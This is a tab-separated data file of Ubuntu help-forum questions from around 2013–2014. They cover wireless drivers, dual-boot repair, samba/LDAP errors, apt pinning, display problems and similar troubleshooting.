413027	how to make a d-link dwa-123 wireless n 150 work on ubuntu 13.10 ( saucy )	i recently installed saucy as part of a dualboot setup . my laptop 's internal network adaptor is shot and so i have to use an external d-link dwa-123 . i have the installation disc and everything and it works perfectly on windows . however , i can not get it to work on ubuntu . how can i go about doing so ? my lsusb output : bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 008 device 003 : id 0cf3:311d atheros communications , inc . bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 002 : id 0c45:6458 microdia bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 005 device 002 : id 0955:7100 nvidia corp . notion ink adam bus 005 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 002 : id 2001:3310 d-link corp . bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub
413028	find and disable unnecessary services in ubuntu 12.04	i have been presented with a server running ubuntu 12.04 lts server edition . this machine was in use earlier for a web application and also has many other applications configured in it . now , i want to remove all the un necessary applications from it like apache2 etc . and do a fresh start for installation of the new application . now , the problem is how can i determine what applications i.e . packages are installed in it , and how can i disable/uninstall and optimize this server . after uninstalling the packages i want to optimize it to disable packages for securing it much like point number 3 in the link here . but it 's not for ubuntu .
413031	can grub boot partition ?	so , my ubuntu is dead ( you will know why if you read my last question ) . after that , i ran rescatux and create a new partition called 'ubuntu iso ' and paste the file from the ubuntu iso file ( installer file ) i get from ubuntu.com . and i boot into super grub2 disk and check the partition . it shown my partition as hdo , msdos1 . so how do i boot into hd0 , msdos1 ?
413035	i can not dual - boot windows and ubuntu 13.10	disk information : i have 10 partitions on my disk currently . here is the gparted image of my disk . partition -- file system -- mount point -- label -- size -- used -- unused -- flags 1 . /dev/sda1 -- fat32 -- /boot/efi -- esp -- 500 mib -- 62.39 mib -- 437.71 mib -- boot 2 . /dev/sda2 -- fat32 -- -- diags -- 40 mib -- 4 mib -- 36 mib -- hidden 3 . /dev/sda3 -- unknown -- -- -- 128 mib -- -- -- msftres 4 . /dev/sda4 -- ntfs -- -- winretools -- 500 mib -- 269.49 mib -- 230.51 mib -- hidden , diag 5 . /dev/sda5 -- ntfs -- -- os -- 442 gib -- 87.30 gib -- 354.76 gib -- boot 6 . /dev/sda6 -- ext4 -- / -- -- 19.53 gib -- 8.71 gib -- 10.82 gib -- msftdata 7 . /dev/sda7 -- ntfs -- /media/anushree/9cfc5884fc585a9a -- 350 mib -- 304.82 mib -- 45.18 mib -- hidden , diag 8 . /dev/sda8 -- ntfs -- /media/anushree/new volume1 -- new volume -- 229.42 gib -- 222.82 gib -- 6.6 gib -- msftdata 9 . /dev/sda9 -- ntfs -- /media/anushree/new volume -- new volume -- 229.42 gib -- 128.75 gib -- 100.67 gib -- msftdata 10. unallocated -- unallocated -- -- -- 1 mib 11 . /dev/sda10 -- ntfs -- -- pbr image -- 9.61 gib -- 9.32 gib -- 289.64 mib -- hidden , diag 12. unallocated -- unallocated -- -- -- 1 mib ( sorry for the bad readability , but i am a new user and i ca n't upload images just yet . ) i installed ubuntu 13.10 on dell inspiron 3521 machine by making a 20 gb partition from my c drive . the os installed successfuly but on rebooting , it booted directly to windows 8 . after looking through a number of forums for a solution to my problem , i ran boot repair using a live-usb . as a result of that , i got an error : file : \efi\microsoft\boot\bcd missing . error code : 0xc000000f . i tried running boot repair a couple more times . grub is installed successfully and ubuntu is running just fine . but every time i try to boot to windows , it gives me the same error . the grub menu has options : windows uefi bkpbootmgfw.efi windows boot uefi loader efi/dell/boot/bootmgfw.efi efi/dell/boot/bootx64.efi to boot into windows . and none of them are allowing me to do that . the 4th option is the recommended one on every forum . what it actually does is it opens a system recovery screen , the one that open for windows 8 , which has the following options : refresh reset advanced options the refresh is not working because apparently my c drive is locked and it can not access it . i do not want to reset my pc because that means i will loose all the data . in the advanced options , the system restore is not working because there is no system image on my pc and i have no backup cd made beforehand ( which is i think my biggest mistake ) . i am looking for any way by which i could save my data . even the dell backup and recovery option could not find any restore point . in the command prompt , i have tried to rebuild the bcd using bootrec commands and bcdedit to access the bcd store to relocate the bcd file . but it gives me errors that there are `` multiple indistinguishable locations '' on the disk and that there was a `` failure to copy boot files '' . no commands are working whatsoever and i can not find any way to get hold of the missing bcd file . the main issue is that the error says the cause maybe a recent hardware change when i have had none since i bought my machine . so it has to be an internal relocation issue because when i ran chkdsk on the volume that consists of my os , there were no corrupt files . i also tried using the installation media to repair my system but it gives these same options as efi/dell/boot/bootx64.efi , so that is no help either . i also tried re-installing windows 8 through the dvd . when it asks me to select a partition to install it in , i selected the one which had my c drive ( 442 gb ) . it gave an error that it is an esp partition and that it can not be used for the installation . moreover , it did not let me select any partition except the one in which ubuntu is installed but even that can not be used because the size is not enough . i need help regarding these issues : is there any way to unlock the c drive and refresh my pc ? is there any automatic system restore point made when windows 8 to 8.1 update is done ? if yes , then where is it stored and how can i access it ? is there a way i could access the missing bcd file and relocate it to the designated folder so that i can boot normally to my system ? any other solutions that anyone can offer to help me dual boot windows and ubuntu normally ?
413037	can not change terminal font using dpkg-reconfigure	i am a brand new unbuntu server user . i am trying to change the default console font . each time i run dpkg-reconfigure console-setup , i keep getting x : not found message for console setup . i have installed the package and keep getting same message . can anyone help ? thanks much
413039	svn incremental backup	i have few remote svn repos and i would like to get them backup in a incremental way . could somebody can help me , thank you ?
413040	solved : remove torntv on 12.04lts and install clamtk	i unintentionally got torntv malware installed on my ubuntu 12.04 system during torrent transmission . so , i used sudo apt-get remove torntv , but the command could n't locate the torntv in system , yet it still appears in applications . afterwards , i installed clamtk using http : //www.askubuntu.com/questions/250290/how-do-i-scan-for-viruses-with-clamav , but there is no menu option for scan , view , quarantine etc ) in clamtk window . fyi , i do have wine installed for ms office use only . and i had also tried installing clam from software center , that gave the same results . any help on removal of torntv will be highly appreciated . thanks in advance , all . !
413041	can access ubuntu share from windows , but not windows shares from ubuntu	i have installed ubuntu 13.10 , configured samba and have access to my ubuntu shares from both my windows 7/8 machines and my mac-book , but i can not access the shares on my windows or mac pcs from ubuntu , ive read a thousand different post in the last 3 days , still no luck . i have even gone as far as reloading from scratch but no go . my other linux pc is mint and it worked out of the box . any ideas would be great , thanks in advance : )
413043	ubuntu 12.04 server resolution	12.04 64 bit server edition in hp proliant ml350e server . in that given resolution only 1600x900 in x-desktop . i want to increase the resolution to 1920x1080 . my hp prodisplay p221 will support 1920x1080 .
413044	is there a better option other than ntfs for a shared hd between ubuntu and windows 7 ?	i have a pc with dual-boot , and i have installed xubuntu ( always newest version ) and windows 7 . i have a new hd and i would like to be able to access it from both os . i suppose ntfs would work since ubuntu supports it , but , i would like to know if there is another format that may be better .
413046	remove chat program ubuntu 12.04	what is chat program installed by default in ubuntu 12.04 that apears on top of ubuntu . and how can i remove it ? it 's icon is like a white mail beside language selection bar .
413047	can i add or change search tags in unity 's dash	i 'm using ubuntu 13.10 and i use two languages english and russian . so i need to switch all the time to english to find and launch applications , for example clementine . is it possible that i set somewhere russian spelling for clementine and it will work for search in dash ?
413052	ubuntu tweak not working ? is it supported for 13.10 ?	i left it for half an hour and returned . what 's wrong with it ? how to fix it ? i 'm running ubuntu 13.10 edit : when running ubuntu-tweak through terminal i get this : minow @ mina-ubuntu : ~ $ ubuntu-tweak compizconfig - info : backend : gsettings compizconfig - info : integration : true compizconfig - info : profile : unity /usr/lib/python2.7/dist-packages/gi/types.py:226 : runtimewarning : mixin class ubuntutweak.gui.widgets.settingwidget is an old style class , please update this to derive from `` object '' . runtimewarning ) /usr/lib/python2.7/dist-packages/gi/types.py:226 : runtimewarning : mixin class scripts.abstractscripts is an old style class , please update this to derive from `` object '' . runtimewarning ) minow @ mina-ubuntu : ~ $ edit : just tried re-installing it , i managed to uninstall it but i ca n't install it again . reading package lists ... done building dependency tree reading state information ... done e : unable to locate package ubuntu-tweak and i ca n't find it in the software center i 'm having a thought , maybe ubuntu-tweak is not supported for 13.10 ? ?
413055	highpoint 620 driver in unbuntu 13.10	i am running the latest ubuntu version atm ( with the 3.11 kernel ) https : //help.ubuntu.com/community/rocketraid is what i used , however i then get the following error upon making the file ... root @ michael-server : /tmp/rr62x-linux-src-v1.2/product/rr62x/linux # make make [ 1 ] : entering directory `/usr/src/linux-headers-3.11.0-15-generic' cc [ m ] /tmp/rr62x-linux-src-v1.2/product/rr62x/linux/.build/os_linux.o cc [ m ] /tmp/rr62x-linux-src-v1.2/product/rr62x/linux/.build/osm_linux.o /tmp/rr62x-linux-src-v1.2/product/rr62x/linux/.build/osm_linux.c : in function ‘s csicmd_buf_put’ : /tmp/rr62x-linux-src-v1.2/product/rr62x/linux/.build/osm_linux.c:482:55 : error : macro `` kunmap_atomic '' passed 2 arguments , but takes just 1 kunmap_atomic ( ( char * ) buf - sg- > offset , hpt_kmap_type ) ; ^ /tmp/rr62x-linux-src-v1.2/product/rr62x/linux/.build/osm_linux.c:482:2 : error : ‘ kunmap_atomic’ undeclared ( first use in this function ) kunmap_atomic ( ( char * ) buf - sg- > offset , hpt_kmap_type ) ; ^ /tmp/rr62x-linux-src-v1.2/product/rr62x/linux/.build/osm_linux.c:482:2 : note : ea ch undeclared identifier is reported only once for each function it appears in /tmp/rr62x-linux-src-v1.2/product/rr62x/linux/.build/osm_linux.c : at top level : /tmp/rr62x-linux-src-v1.2/product/rr62x/linux/.build/osm_linux.c:2111:2 : error : unknown field ‘proc_info’ specified in initializer proc_info : hpt_proc_info26 , ^ /tmp/rr62x-linux-src-v1.2/product/rr62x/linux/.build/osm_linux.c:2111:2 : warning : initialization from incompatible pointer type [ enabled by default ] /tmp/rr62x-linux-src-v1.2/product/rr62x/linux/.build/osm_linux.c:2111:2 : warning : ( near initialization for ‘driver_template.proc_dir’ ) [ enabled by default ] make [ 2 ] : *** [ /tmp/rr62x-linux-src-v1.2/product/rr62x/linux/.build/osm_linux.o ] error 1 make [ 1 ] : *** [ _module_/tmp/rr62x-linux-src-v1.2/product/rr62x/linux/.build ] erro r 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.11.0-15-generic' make : *** [ rr62x.ko ] error 2 root @ michael-server : /tmp/rr62x-linux-src-v1.2/product/rr62x/linux # cd /tmp would someone be so kind to assist me in what is wrong in this ? will this also allow me to use the sata ports as a sata extender ? ( ive got a fantec ( e ) -sata extender hence the question ... ) maybe someone can just provide the files as needed ? ( so all i basically have to do , is place the files in the correct folder ( i am sure its something i can handle : ) ) and be done /w it ... .
413056	libnotify delays after upgrade to 13.10	after upgrade to 13.10 libnotify started to behave strangely - notifications come with delay . for example , i receive mail , thunderbird plays notification and only after some time ( 5-10 seconds maybe ) osd shows and message indicator ( or whatever it is ? ) turns blue . same for pidgin .
413058	windows and ubuntu linking	i am a phd student doing aeroelastic cfd simulations and i am working with one fluid open source code ( flower ) running on ubuntu and one commercial sturctural csoftware ( simpack ) running on windows and i want to pass the output from one code to the other in two diriction . can anybody help me to do this link ? mohamed
413060	apt pinning is pinning all sources	i 've installed a ppa , ondrej/php5 , so i can install php 5.5 on a ubuntu 12.04 server . however , i want to install apache 2.2 , and the above ppa provides apache 2.4 . i created the file /etc/apt/preferences.d/apache2 : package : *apache* pin : release o=lp-ppa-ondrej-php5 pin-priority : -100 relevant lines from apt-cache policy : 500 http : //ppa.launchpad.net/ondrej/php5/ubuntu/ precise/main i386 packages release v=12.04 , o=lp-ppa-ondrej-php5 , a=precise , n=precise , l=ppa for php5 , c=main origin ppa.launchpad.net 500 http : //ppa.launchpad.net/ondrej/php5/ubuntu/ precise/main amd64 packages release v=12.04 , o=lp-ppa-ondrej-php5 , a=precise , n=precise , l=ppa for php5 , c=main origin ppa.launchpad.net after creating the file , here is the result of apt-cache policy apache2 : apache2 : installed : ( none ) candidate : ( none ) package pin : 2.4.6-3+debphp.org~precise+1 version table : 2.4.6-3+debphp.org~precise+1 -100 500 http : //ppa.launchpad.net/ondrej/php5/ubuntu/ precise/main amd64 packages 100 /var/lib/dpkg/status 2.2.22-1ubuntu1.4 -100 500 http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ precise-updates/main amd64 packages 500 http : //security.ubuntu.com/ubuntu/ precise-security/main amd64 packages 2.2.22-1ubuntu1 -100 500 http : //us-east-1.ec2.archive.ubuntu.com/ubuntu/ precise/main amd64 packages why are official ubuntu repos being given a priority of -100 ?
413067	unknown monitor	i hope to find a way to solve a problem about the displays : i have only the built-in display , and nothing else attached , but , in the settings , the system finds also another display , which is unknown . can anyone tell me how to remove it ? thanks in advance .
413068	how can i flash ubuntu touch using a windows install ?	currently , i 'm using windows 7 , and i would like to flash ubuntu touch to my nexus 4 . is there a way to do this ? can i boot a ubuntu vm , share the nexus 4 and have it work ?
413072	ubuntu 12.04.3 lts clock settings on install	i 'm trying to install ubuntu server 12.04.3 lts on a hp proliant server machine but when the installation tries to sync the clock , the installation process stops and i ca n't find the way to skip the step . any advice will be appreciated .
413073	how may i restrict accesing apache using server ip address ?	i have a server . i installed and configured virtualmin/webmin on it . also i added three domains and configured almost 100 % correct all dns records . my big question is how i restrict accessing website through server ip . or how to redirect the ip to a specific location from my server to load specific files ?
413076	connection from samba to ldap server failed	i use samba and ldap for file sharing and directory service . some days ago , i noticed that samba has problem in connection to the ldap service while beforehand it was working properly . but still the shared directories were accessible . after restarting the smbd service , it is not accessible anymore . so , there are lots of necessary files unavailable for people in the network ! any help ? the samba log file has reported : [ 2014/01/30 11:21:59 , 1 ] lib/smbldap.c:1265 ( another_ldap_try ) connection to ldap server failed for the 1 try ! [ 2014/01/30 11:22:00 , 1 ] lib/smbldap.c:1265 ( another_ldap_try ) connection to ldap server failed for the 2 try ! [ 2014/01/30 11:22:01 , 1 ] lib/smbldap.c:1265 ( another_ldap_try ) connection to ldap server failed for the 3 try ! [ 2014/01/30 11:22:02 , 1 ] lib/smbldap.c:1265 ( another_ldap_try ) . . ( the number is just counted up ) . connection to ldap server failed for the 13 try ! [ 2014/01/30 11:22:12 , 1 ] lib/smbldap.c:1265 ( another_ldap_try ) connection to ldap server failed for the 14 try ! [ 2014/01/30 11:22:13 , 1 ] lib/smbldap.c:1265 ( another_ldap_try ) connection to ldap server failed for the 15 try ! [ 2014/01/30 11:22:14 , 0 ] smbd/server.c:1201 ( main ) error : failed to setup guest info . [ 2014/01/30 11:22:14 , 0 ] smbd/server.c:1069 ( main ) smbd version 3.4.7 started . copyright andrew tridgell and the samba team 1992-2009 [ 2014/01/30 11:22:14 , 0 ] smbd/server.c:1115 ( main ) standard input is not a socket , assuming -d option [ 2014/01/30 11:22:14 , 0 ] lib/smbldap.c:1086 ( smbldap_connect_system ) failed to bind to server ldapi : /// with dn= '' uid=samba , ou=system-accounts , dc=example , dc=com '' error : invalid credentials ( unknown ) some corresponding system logs : jan 30 14:27:34 atom-lan slapd [ 2320 ] : connection_read ( 24 ) : no connection ! jan 30 14:27:35 atom-lan winbindd [ 2872 ] : [ 2014/01/30 14:27:35 , 0 ] lib/smbldap.c:656 ( smbldap_store_state ) jan 30 14:27:35 atom-lan winbindd [ 2872 ] : panic : assert failed at lib/smbldap.c ( 656 ) : tmp_ldap_state == smbldap_state . . ( repetition ) . jan 30 14:42:55 atom-lan init : smbd main process ( 5977 ) terminated with status 255 jan 30 14:42:55 atom-lan init : smbd main process ended , respawning jan 30 14:42:55 atom-lan smbd [ 6037 ] : [ 2014/01/30 14:42:55 , 0 ] smbd/server.c:1115 ( main ) jan 30 14:42:55 atom-lan smbd [ 6037 ] : standard input is not a socket , assuming -d option jan 30 14:42:55 atom-lan smbd [ 6037 ] : [ 2014/01/30 14:42:55 , 0 ] lib/smbldap.c:1086 ( smbldap_connect_system ) jan 30 14:42:55 atom-lan smbd [ 6037 ] : failed to bind to server ldapi : /// with dn= '' uid=samba , ou=system-accounts , dc=example , dc=com '' error : invalid credentials
413077	is there any tools to remove all `` links '' from a pdf file	i 'm using lubuntu in my laptop and i have an e-book reader . ( sony reader prs-t2 ) however , my e-book reader struggles to open several pdf files with links in it , such as webpage i saved using google 's chrome build-in print-to-pdf tool . is there any software ( cli or gui ) that can remove those links from my pdf files ? i have have tried `` flattening '' function from pdf chain and pdftk but they do not work . p.s . i have tried the solution in open source command line tools to remove hyperlinks in pdfs ? but for some reason it does n't work .
413082	is denyhost central database stored locally ?	i was tasked to write a security policy to apply to any ubuntu server we deploy at a client 's site . knowing how some of the corporate are restrictive on what resource is available to what box on their network especially banks i have been wondering . let me explain , if i understand well , denyhost itself connects to a database ( or databases ) to either report or fetch all `` bad '' ips . first question is whether that database is local or stored somewhere on a host on the internet . second question is related to the first one . if that database is online , how secure it is from being hacked itself ( an attacker could rather tamper with the database removing its new ip ) i will really appreciate if anyone can shed some light on this
413092	how to restrict user activity in ubuntu 13.10	i want to restrict user activity to only two specific applications . this is a remote connection program , java and mozilla in case the original app is not working . how can i do this ? do i need to install a third party program for that ?
413094	computer breaks usb installation	i have often done this before : install ubuntu on a usb and use it to boot from it from different machines ( two similar dell laptops , similar components etc. ) . i know , normally you use a live system for full portability and that the ubuntu installer configures hardware etc . when installing on a specific setup , but i have never had problems with it . ( i even ran it successfully on completely different hardware without problems ) . today it thought , i want to try it on a colleagues machine , because he thinks it is kind of broken ( windows randomly shows blue screen when working with it ) . it is a new machine however . so i used a usb that has never been attached to any system but mine before , everything ran fine . then after i booted the usb on the lattop of my colleague and everything ran fine , i booted it again on my computer : result : does not boot anymore . i thought : okay maybe a file system error , ran btrfsck , but it did not show anything of interest . i ended up setting up the usb from scratch . after that i set up another usb with a fresh copy of ubuntu . i successfully installed some software , powered the system off and bootet from the colleagues machine . everything worked . then i tried to install some software there , but apt complained , that debconf is missing . apt-get install -f did not work either , so basically the whole package management was broken in a irreparable state . this can not be coincidence , can it ? so my question is : could faulty hardware ( other than the storage device itself ) screw with the root filesystem so that it breaks ?
413101	how to install libre office 4.x on ubuntu 12.04 lts ?	i realized that libre office does not update automatically and i still have version 3.5.7.2 how can i force it to update in the command line ?
413105	installing specific package ( new version )	i am using ubuntu 12.04 and my current version of open blas is 0.1alpha2.2-3 . there is a bug in this version that has been fixed by https : //bugs.launchpad.net/ubuntu/+source/openblas/+bug/817212 how can i install this newer version which has resolved the bug ?
413110	what should i do if an application gets glitchy ? ( ubuntu tweak )	sorry for lack of proper terminology ! basically , i 've been getting along great with ubuntu tweak , and i was loving the extra workspaces . however , the arrow short-cuts to switch between the workspaces were always a bit glitchy : ctrl + shift + down + right worked for switching diagonally between two workspaces , yet ctrl + shift + up + left literally did nothing , and certainly did n't switch between workspaces diagonally aligned to each other . anyway , for no reason i can fathom ( no updates , no hardware , nothing ) , ctrl + shift + up and ctrl + shift + down has stopped working completely for switching between vertically aligned workspaces . however , ctrl + shift + left and ctrl + shift + right still works perfectly for horizontally aligned workspaces . so is this a common problem with ubuntu tweak ? if so i do i go about fixing it ? are there some generic commands i can run to find the source of the problem , or repair ubuntu tweak ? failing the above , are there any alternatives to ubuntu tweak ?
413111	how can i change the default nautilus-actions settings for all new users ?	how can i change the default nautilus-actions settings for all new users ? i need to install ubuntu on many machines . they will all be customized with some nautilus-actions actions . users will be added later , without my supervision . many of the nautilus actions have the execution mode set to `` in a terminal '' . out of the box , `` in a terminal '' does not function . the `` command pattern '' setting in preferences must first be set to `` /usr/bin/gnome-terminal -x sh -c command '' . how can i set the default for this setting during , or immediately after installation so that the actions will function correctly for new users ?
413118	ppp connection can receive but not send	i have the following setup : an embedded system running a proprietary ip stack ( made by interniche ) ubuntu 12.04 server edition , running inside virtual box on windows 7 the embedded system is connected through a serial cable to ubuntu , where i have pppd running to setup a ppp link between the embedded system and ubuntu . ubuntu also an ethernet connection to the outside world ( using the bridge network adapter of virtual box ) . the address of both ends of the ppp link are fixed . on embedded system , an udp server periodically pings the other side of the link . i can receive the udp packets from the embedded system , but i can not send them over the link . and the ppp0 interface does not show in the routing tables . what am i doing wrong this is my configuration for the ppp daemon : sudo pppd debug dump passive noauth nodetach 115200 /dev/ttyusb0 local nocrtscts nocdtrcts lcp-max-configure 1 lcp-echo-interval 20 lcp-echo-failure 1 lcp-max-terminate 1 noccp noip ipv6 : :25 , ::26 ( also no success with the extra options : defaultroute ktune proxyarp ) and the output of ifconfig : eth0 link encap : ethernet hwaddr 08:00:27:0f:08:01 inet adr:192.168.254.30 bcast:192.168.254.255 masque:255.255.255.0 adr inet6 : fe80 : :a00:27ff : fe0f:801/64 scope : lien up broadcast running multicast mtu:1500 metric:1 packets reçus:3885 erreurs:0 :19 overruns:0 frame:0 tx packets:363 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 lg file transmission:1000 octets reçus:431390 ( 431.3 kb ) octets transmis:41670 ( 41.6 kb ) lo link encap : boucle locale inet adr:127.0.0.1 masque:255.0.0.0 adr inet6 : : :1/128 scope : hôte up loopback running mtu:65536 metric:1 packets reçus:2 erreurs:0 :0 overruns:0 frame:0 tx packets:2 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 lg file transmission:0 octets reçus:154 ( 154.0 b ) octets transmis:154 ( 154.0 b ) ppp0 link encap : protocole point-à-point adr inet6 : fe80 : :25/10 scope : lien up pointopoint running noarp multicast mtu:1500 metric:1 packets reçus:62 erreurs:0 :0 overruns:0 frame:0 tx packets:60 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 lg file transmission:3 octets reçus:3215 ( 3.2 kb ) octets transmis:5727 ( 5.7 kb ) and the routing tables : destination passerelle genmask indic metric ref use iface default 192.168.254.254 0.0.0.0 ug 100 0 0 eth0 192.168.254.0 * 255.255.255.0 u 0 0 0 eth0
413120	how to partition your internal harddrive in ubuntu 12.04 lts	i am a newbie in ubuntu 12.04 lts . i want to partition my hard drive of 320gb so that i can divide it into 2 or more partitons . how to proceed ? can anybody help ? already installed gparted but i am not able to unmount my /dev/sda1 nor am i able to create a new partion table . when i select unmount /dev/sda1 the message is : most likely other partitions are also mounted on these mount points . you are advised to unmount them manually . when i select create partion table the msg is : 2 partitions are currently active on device /dev/sda . ! [ this is my hard drive properties in gpart ] [ 1 ]
413121	what was the meaning of a special character on the shebang line ?	i saw a script like below , # ! /bin/zsh - del=10 rm -f /mnt/md0/capture/dcn/* ( nd.om [ 1 , $ del ] ) what was purpose of adding - on a shebang line ?
413125	upstart : start server after mongodb	i would like to start a server after mongodb has started . is it correct to use start on started mongodb ? example upstart script : start on started mongodb stop on starting rc runlevel= [ 016 ] respawn exec start-stop-daemon -- start -- make-pidfile -- pidfile /var/run/myserver.pid -- exec myserver > > /var/log/myserver.log 2 > & 1
413131	is it possible to to use ssmtp with psad	i have been searching online and i have n't seen yet a way to use psad with the simple ssmtp . i would be grateful if anyone can share a link or shed a light on configuration . i believe it will be an overkill to have postfix installed as there is already ssmtp configured to use a gmail account . thank you very much
413134	sed , grep , and awk file sorting	i 'm trying to get all the files which have 'load ' in their names from a directory . i 'm trying to do : find -type f | sed -s 'load however , i recurrently receive an error sed : -e expression # 1 , char 1 : unknown command : `f' a worse part is that although i am able to manipulate regexes i 'm really bad at using grep/sed/awk , and this is slowing me down all the time . whatever material i found online so far is n't great . do you guys have any know of any comprehensive and fairly concise screencasts/tutorials ? i still miss the skill to read and quickly understand linux manuals .
413140	ubuntu start hangs ( nouveau / iwlwifi )	i tried to install ubuntu 13.10 on my xps 15 haswell . the hardware is : intel i7 4702hq ( +intel hd graphics 4600 ) nvidia gt550m 16gb ram 512gb msata ssd i had already win 8.1 installed and tried to create a dualboot system . the installer did only launch with the `` nomodeset '' option , else i got a blackscreen after the splash . installing was possible without problems then . but now i ca n't boot into the graphical inteface . without `` nomodeset '' it hangs on loading the nouveau driver . when i set the `` nomodeset '' option in grub it hangs on loading iwlwifi : 9.730405 iwlwifi 0000:006:00:0 : no association and the time event is already over ... 13.861085 iwlwifi 0000:006:00:0 : no association and the time event is already over ... ... can you help me please ? thanks in advance
413143	gatewax fx400 crash after installing bumblebee : no video from nvidia card or onboard vga	i have been trying to install nvidia card for a week to no avail . then i tried to install bumblebee and rebooted . but now i have nothing : just light on computer , and no output either vga or dvi via graphics card . i tried every thing including removing graphic card . what can i do to solve this ?
413146	do themes change the layout of the desktop on ubuntu ?	question is same as title . if i download different themes are they just backgrounds and colour combos or do they change the layout and working of the desktop like a launcher on my phone ? i have unity and have seen lots of different themes but do not know whether or not to download them if they are just colours and not changes of layouts .
413147	vlc media player suddenlly stopped playing .m2ts files ?	i 'm new to ubuntu and i am using vlc player suddenly it stopped playing m2ts files all other files are ok except for m2ts i think this happened after i executed the following commands : sudo add-apt-repository ppa : danielrichter2007/grub-customizer sudo apt-get update sudo apt-get install grub-customizer from this link : make ubuntu first option when dual booting any help to fix this ...
413150	is it bad practice for folder name to contain dot ( . ) ? how about file name with multiple dots ?	sometimes it makes practical sense for a folder name to contain a dot ( . ) . for example , you are storing data for an experiment conducted at l=0.5 . so the folder might be named : experiment_l0.5 a similar issue may arise for file names . for example : file_l0.5.txt working in ubuntu , is this bad practice ? how about if sharing these directories with a windows user ? thanks !
413152	how to do packaging of adt ( android development tools ) for ppa ?	from last few days i am trying to learn packaging in ubuntu . i successfully created binary deb of scilab 5.4.1 & adt but i do n't have any webspace or server to host repository for these packages . so i tried to upload the source files of these packages to launchpad . but for some reason the binary which were compiled by launchpad does n't contain package files . can somebody help me with the procedure to create packages for ppa with binary files in it ? i will be very grateful . i 'm placing 'usr/adt/eclipse ' & 'usr/adt/sdk ' folders in the same directory ( adt-22.2.1~ppa1 ) with debian directory.and using postinst & postrm files to control installation . thanks ! regards navdeep singh
413161	touchegg gestures on desktop	i am trying to use three finger scrolling on the desktop , but it is not responding . it only works when i am holding the cursor on a app or the plank . can i edit something in the config file to change this ?
413163	captive portal setup and content of interfaces file	i am trying to design a captive by referring to this link captive portal using php and iptables firewall on linux in initial setup ( linux box router ) it is said that my interface file should be as follows : file : /etc/network/interfaces auto lo iface lo inet loopback iface eth0 inet dhcp auto eth1 iface eth1 inet static address 192.168.3.1 network 192.168.3.0 netmask 255.255.255.0 i am using asus k55v series laptop with ubuntu server 13.04 installed . there is atheros ar9485wb-eg wireless network adapter and realtek pcie gbe family controller nics . and my interfaces file looks similar till iface eth0 inet dhcp . in requirements it is stated that there should be atleast 2 network cards . one for main connection and other one for publicly accessible hotspot . so can anyone please tell as to which wireless network card to buy so that i 'll above mentioned configuration in interfaces file . i have no idea but networking stuff so please help .
413168	laptop shutdown , can not terminate all processes	ubuntu 12.04 lts hp laptop i am really desperate , since i now only occasional have access to the internet and i need my laptop for an upcoming exam in practical statistics.. a week ago it started : notebook shutdown often didnt work - > had to push the power button sometimes even starting doesnt work with same screen : [ 4976.650011 ] process xorg ( pid ... . [ 4976.650011 ] stack : [ 4976.650011 ] numbers ... [ 4976.650011 ] numbers.. [ 4976.650011 ] call trace : [ 4976.650011 ] radeon_gart_unbind [ 4976.650011 ] raeon_ttm_backend_unbind [ 4976.650011 ] ttm_bo_cleanup_memtype [ 4976.650011 ] ttm_bo other stuff ... [ 4976.650011 ] ... [ 4976.650011 ] radeon ... [ 4976.650011 ] drm_gem_object ... [ 4976.650011 ] idr_for_each [ 4976.650011 ] fput ... [ 4976.650011 ] task_work_run [ 4976.650011 ] exit ... [ 4976.650011 ] wake up_state ... [ 4976.650011 ] signal_wake_up_state [ 4976.650011 ] do group_exit [ 4976.650011 ] sys_exit_group [ 4976.650011 ] sysenter_do_call [ 4976.650011 ] code : ... ... .. [ 4976.650011 ] end trace [ 4976.650011 ] fixing recursive fault but reboot is needed ! checking for running unattended upgrades speech-dispatcher disabled : edit /etc/default/speech-dispatcher stopping winbind daemon winbind askingh all remaining processes to terminate lightdm main process ( 1056 ) killed by kill signal
413169	resolution of installation super small	how does one change the resolution for the installation of ubuntu 13.10 ? when i boot i get a black screen with only sound . this is only for the install ubuntu option , the try it out first part never even makes a sound . i added the nomodeset option and now i get 3 incredibly small windows side by side of the ubuntu install gui . the problem here is its like 2 by 3 inches so i can hardly read anything and i do n't want to make partitions without being able to properly see what i am doing . is there anyway to set the resolution to scale up to the full screen so i can see what is going on ? i am on nvidia 650m if it helps .
413170	display issue on remote machine using gdm x11	i am remotely logging into an ubuntu machine through ssh ( mobaxterm ) using gnome desktop remote environment from my windows pc . i am having trouble with one of our video applications in displaying video . later i tried vlc as well . i could see a local file playing , but the vlc display screen is all black and there is no video . i tried several things suggested for problems similar to this , but nothing worked . things i have tried : export display=:0 in bashrc i observed that with this change the video applications and vlc if instantiated from terminal from ssh session , the application windows are opening on the actual remote ubuntu machine . hence i reverted this . added the following code to ~/.profile ( suggested here ) : case $ display : $ xauthority in : * : ? * ) # display is set and points to a local display , and xauthority is # set , so merge the contents of ` $ xauthority` into ~/.xauthority . xauthority=~/.xauthority xauth merge `` $ xauthority '' ; ; esac added the following line to /etc/ssh/sshd_config : x11uselocalhost yes but none of these worked . can someone help me on this one ?
